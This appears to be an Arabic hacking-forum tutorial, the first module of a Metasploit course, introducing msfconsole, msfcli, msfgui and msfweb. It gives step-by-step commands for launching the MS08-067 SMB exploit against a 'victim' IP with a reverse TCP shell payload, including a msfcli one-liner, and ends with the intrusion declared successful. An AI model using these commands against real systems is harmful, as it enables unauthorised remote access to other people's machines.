:: vBspiders Professional Network :: - module 1 : ماهي msfconsole,msfcli,msfweb,msfgui و نبذة عن الأوامر .(METASPLOIT TRANNING)

السلام عليكم ورحمة الله وبركاته
بسم الله الرحمن الرحيم

http://ceh.vn/ceh3/images/tutorial/icon2.png

في هذا الدرس :
ستتعرف msfconsole واوامره , كيفية العمل به
ستتعرف msfcli
ستتعرف msfgui
ستتعرف msfweb

مشروع Metasploit مشروع كبير جدا و مشهور عالميا ، بدايته كانت سنة 2003 , كان يحتوي على القليل من exploits و payloads , فبدأت عملية التطور ليصل اليوم محملا ب 496 exploits و 192 payloads و 239 auxiliary. بالاضافة للعديد من الأدوات التي تساعدنا على اكتشاف ثغرات Buffer overflow ... و الكثير الكثير

سنتحدث اكثر عن msfconsole
تعريف صغير عن البقية

-----------------------
msfconsole
-----------------------
تجدونها على باك تراك هنا :

كود PHP:

   pentest/exploits/framework3/msfconsole

http://img137.imageshack.us/img137/2893/msfconsole.png

ندخل الان في الاوامر :
اهم امر help
لن اشرحو هههه

امر show :

show exploits
اظهار جميع الثغرات

show payloads
اظهار جميع payload

show auxiliary
اظهار جميع auxiliary

search
للبحث ;مثال :

http://img25.imageshack.us/img25/6450/searchwc.png

امر info
تعطينا معلومات ;مثال :

http://img707.imageshack.us/img707/1309/infom.png

امر use
احنا عندنا ثغرة نريد استخدامها ،
اذا use ;مثال :

كود PHP:

   msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >

اكتب show options لترى options الثغرة ;مثال :

http://img706.imageshack.us/img706/5976/showoptions.png

ماذا يهمنا هنا ???
الظحية rhost
rport البورت المصاب اتركه كما هو
نظع ip الظحية set RHOST ip ;مثال :

كود PHP:

   msf exploit(ms08_067_netapi) > set RHOST 192.168.1.2
RHOST => 192.168.1.2

الان نأتي الى المهم ال payload
باختصار هو كيفية التحكم بجهاز victim
اكتب show payloads من ثم اختر واحدا
باختصار هذه ال payload هي الاقوى :

كود PHP:

   windows/shell/reverse_tcp
windows/shell/bind_tcp
windows/vncinject/bind_tcp
windows/meterpreter/reverse_tcp

سنأتي على تعريفها في الدروس القادمة

نظع ال set payload :::payload ;مثال :

كود PHP:

   msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp

اكتب show options لترى options الثغرة again ;مثال :

http://img513.imageshack.us/img513/299/showoptions2.png

هههه كبرت
شوف lhost تظع هنا ال ip تبعك ;مثال :

كود PHP:

   msf exploit(ms08_067_netapi) > set LHOST 192.168.1.3
LHOST => 192.168.1.3

كل شيء تمام

الان اكتب exploit للاستغلال ;مثال :

http://img402.imageshack.us/img402/7353/exploit.png

:icon555: :00001793[1]:

تم الاخترق

ملا حظة هامة جدا
انا استعملت ثغرة windows/smb/ms08_067_netapi
يعني انت ممكن تمشي معاك ممكن لا
استعمل ما تعلمته قبل قليل للبحث عن ثغرة تعمل
ان شاء الله استفدتوووا

-----------------------
msfcli
-----------------------

باختصار هيا للاختصار
مثال :

كود PHP:

   /pentest/exploits/framework3/msfcli windows/smb/ms08_067_netapi payload=windows/shell/reverse_tcp RHOST=192.168.1.2 LHOST=192.168.1.2 E

-----------------------
msfgui
-----------------------
للاغبياء فقط :icon666:
تشغيلها سهل :

كود PHP:

   pentest/exploits/framework3/msfgui

http://www.offensive-security.com/msf/msfgui-00.png

-----------------------
msfweb
-----------------------
الاجمل و الاروع :666:
تشغيلها سهل :

كود PHP:

   pentest/exploits/framework3/msfweb

ثم اذهب للمتصفح :

كود PHP:

   http://127.0.0.1:55555/

http://img20.imageshack.us/img20/4402/webr.png

ان شاء الله اكون وصلت بعض المعلومات و لو القليل
ان شاء الله بتفهم اكثر مع الدروس القادمة
ارجوا من اصحاب القلوب المريضة حفض الحقوق والله تعبت عليه
best regards
data$hack